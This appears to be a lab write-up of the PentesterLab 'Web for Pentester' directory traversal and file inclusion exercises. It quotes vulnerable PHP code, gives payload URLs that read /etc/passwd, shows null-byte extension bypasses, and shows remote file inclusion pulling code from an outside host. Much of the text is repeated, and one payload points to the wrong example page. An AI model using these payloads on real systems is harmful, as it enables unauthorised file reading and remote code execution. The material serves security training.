We are sticking with the lab 'Web For pentester' of Pentesterlab , this time with blocks vulnerabilities of the type 'directory traversal' and 'file inclusion', by which an attacker can read and even execute code calling files outside the document root of web server (both locally and, occasionally, remote) using relative path ("../") or complete, usually because the data entry on the client side is not filtered correctly either.
DIRECTORY TRAVERSAL
As we say, exploiting these vulnerabilities results in access to files that should not be accessible.
When you start with each of these dir or path traversal exercises you will not have the link directly but some small images / icons, so you have to read the source code (or use the right button and "copy image location") previously.
Exercise 1
The first link is http: //pentesterlab/dirtrav/example1.php? File = hacker.pngand if you open it with the browser it will show you the html code instead of the image, probably because the Content- Type.
SERVER
As you can see in the server code, $ file = $ _GET ['file'] is not filtered ; so exploit this vulnerability is trivial, simply adding "../" a few times to get to the root and, from there, indicate the routes and common or predictable files to read. Of course, you must take into account that you can access the files with the permissions assigned to the user running the web server, so you will not normally be able to access files such as / etc / shadow.
PAYLOAD:
In this case the browser shows the output directly, but many times we will have to download the file (Content-Disposition: attachment header) and then edit it to see its contents. To avoid the real heaviness of doing this, especially when working with many files we can use other tools such as wget:
Exercise 2
In the following exercise you will see that the path where the image is located is located: http: //pentesterlab/dirtrav/example2.php? File = / var / www / files / hacker.png .
If you check the code you will see that it is verified that in the request that full path must exist:
so we can read the same passwd file simply by putting the path of the image at the beginning of our payload:
PAYLOAD
Exercise 3
In the last exercise it is also forced that the extension of the image file is .png:
SERVER
There is an old vulnerability especially in old versions of PHP (up to 5.3.4) and perl that allows to cancel the processing of the rest of a chain from a null byte (encoded). That is, we can load a payload that contains the path of the image and the extension of the image indicated in the PHP code but, when containing the character, the process in the filesystem will ignore the rest of the chain, being able to access other files without the .png extension
In the exercise code it is simulated by means of a preg_replace function (it also cancels the need to indicate the full path), so that we can only use our payload with null byte:
PAYLOAD
FILE INCLUDE
The next type of vulnerability is due to poor control when handling calls to functions such as require, require_once, include or include_once in php, which developers use to load code that needs to be reused in multiple pages of the web application. . If this vulnerability exists, an attacker could be able to replace the original file with another one, in such a way that it could reach:
- read any local file of the filesystem ( path traversal )
- read and, if it has code interpretable by the web server, execute any local filesystem file( local file inclusion or LFI )
- read and, if it has interpretable code by the web server, execute any external remote file ( remote file inclusion or RFI ).
Exercise 1
In the first exercise we will get the following error when injecting any character, eg. a quote:
As you can see, we obtain information about the complete path where the script is (/var/www/fileincl/example1.php), the function used (include ()) and the value it expects is the file intro.php. And if you take a look at the server code you will see that proof of concept can not be simpler:
SERVER
So as there is no type of filter we can inject without any restriction:
PAYLOAD 1 (path or dir traversal)
On the other hand, for the PoC for the RFI it is enough to search for example a txt file accessible from the Internet with a simple phpinfo function:
Code
Eg http://www.spenneberg.org/phpinfo.txt
PAYLOAD 2 (RFI)
Exercise 2
The second exercise is similar to what we saw earlier in dir dir exercises, in that it is a simulation to be vulnerable to the injection of null bytes, aspect that we remember was solved since PHP version 5.3.4.
SERVER
PAYLOAD 1 (path or dir traversal)
PAYLOAD 2 (RFI)
DIRECTORY TRAVERSAL
As we say, exploiting these vulnerabilities results in access to files that should not be accessible.
When you start with each of these dir or path traversal exercises you will not have the link directly but some small images / icons, so you have to read the source code (or use the right button and "copy image location") previously.
Exercise 1
The first link is http: //pentesterlab/dirtrav/example1.php? File = hacker.pngand if you open it with the browser it will show you the html code instead of the image, probably because the Content- Type.
SERVER
<?php
$UploadDir = '/var/www/files/';
if (!(isset($_GET['file'])))
die();
$file = $_GET['file'];
$path = $UploadDir . $file;
if (!is_file($path))
die();
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($path) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($path));
$handle = fopen($path, 'rb');
do {
$data = fread($handle, 8192);
if (strlen($data) == 0) {
break;
}
echo($data);
} while (true);
fclose($handle);
exit();
?>As you can see in the server code, $ file = $ _GET ['file'] is not filtered ; so exploit this vulnerability is trivial, simply adding "../" a few times to get to the root and, from there, indicate the routes and common or predictable files to read. Of course, you must take into account that you can access the files with the permissions assigned to the user running the web server, so you will not normally be able to access files such as / etc / shadow.
PAYLOAD:
http://pentesterlab/dirtrav/example1.php?file=../../../../../../../../etc/passwd
wget -O - http://pentesterlab/dirtrav/example1.php?file=../../../../../../../../etc/passwd
Exercise 2
In the following exercise you will see that the path where the image is located is located: http: //pentesterlab/dirtrav/example2.php? File = / var / www / files / hacker.png .
If you check the code you will see that it is verified that in the request that full path must exist:
<?php
if (!(isset($_GET['file'])))
die();
$file = $_GET['file'];
if (!(strstr($file,"/var/www/files/")))
die();
if (!is_file($file))
die();
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($file) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($file));
$handle = fopen($file, 'rb');
do {
$data = fread($handle, 8192);
if (strlen($data) == 0) {
break;
}
echo($data);
} while (true);
fclose($handle);
exit();
?>so we can read the same passwd file simply by putting the path of the image at the beginning of our payload:
PAYLOAD
http://pentesterlab/dirtrav/example2.php?file=/var/www/files/../../../../etc/passwdExercise 3
In the last exercise it is also forced that the extension of the image file is .png:
SERVER
<?php
$UploadDir = '/var/www/files/';
if (!(isset($_GET['file'])))
die();
$file = $_GET['file'];
$path = $UploadDir . $file.".png";
// Simulate null-byte issue that used to be in filesystem related functions in PHP
$path = preg_replace('/\x00.*/',"",$path);
if (!is_file($path))
die();
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($path) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($path));
$handle = fopen($path, 'rb');
do {
$data = fread($handle, 8192);
if (strlen($data) == 0) {
break;
}
echo($data);
} while (true);
fclose($handle);
exit();
?>There is an old vulnerability especially in old versions of PHP (up to 5.3.4) and perl that allows to cancel the processing of the rest of a chain from a null byte (encoded). That is, we can load a payload that contains the path of the image and the extension of the image indicated in the PHP code but, when containing the character, the process in the filesystem will ignore the rest of the chain, being able to access other files without the .png extension
In the exercise code it is simulated by means of a preg_replace function (it also cancels the need to indicate the full path), so that we can only use our payload with null byte:
PAYLOAD
http://pentesterlab/dirtrav/example3.php?file=../../../../etc/passwd.png%2500FILE INCLUDE
The next type of vulnerability is due to poor control when handling calls to functions such as require, require_once, include or include_once in php, which developers use to load code that needs to be reused in multiple pages of the web application. . If this vulnerability exists, an attacker could be able to replace the original file with another one, in such a way that it could reach:
- read any local file of the filesystem ( path traversal )
- read and, if it has code interpretable by the web server, execute any local filesystem file( local file inclusion or LFI )
- read and, if it has interpretable code by the web server, execute any external remote file ( remote file inclusion or RFI ).
Exercise 1
In the first exercise we will get the following error when injecting any character, eg. a quote:
As you can see, we obtain information about the complete path where the script is (/var/www/fileincl/example1.php), the function used (include ()) and the value it expects is the file intro.php. And if you take a look at the server code you will see that proof of concept can not be simpler:
SERVER
<?php
if ($_GET["page"]) {
include($_GET["page"]);
}
?>So as there is no type of filter we can inject without any restriction:
PAYLOAD 1 (path or dir traversal)
http://pentesterlab/fileincl/example1.php?page=../../../../../etc/passwdOn the other hand, for the PoC for the RFI it is enough to search for example a txt file accessible from the Internet with a simple phpinfo function:
Code
<?php
phpinfo();
?>Eg http://www.spenneberg.org/phpinfo.txt
PAYLOAD 2 (RFI)
http://pentesterlab/fileincl/example1.php?page=http://www.spenneberg.org/phpinfo.txt
Exercise 2
The second exercise is similar to what we saw earlier in dir dir exercises, in that it is a simulation to be vulnerable to the injection of null bytes, aspect that we remember was solved since PHP version 5.3.4.
SERVER
<?php
if ($_GET["page"]) {
$file = $_GET["page"].".php";
// simulate null byte issue
$file = preg_replace('/\x00.*/',"",$file);
include($file);
}
?>PAYLOAD 1 (path or dir traversal)
http://pentesterlab/fileincl/example2.php?page=../../../../../etc/passwd%2500PAYLOAD 2 (RFI)
http://pentesterlab/fileincl/example1.php?page=http://www.spenneberg.org/phpinfo.txt%2500
Tags:
Injection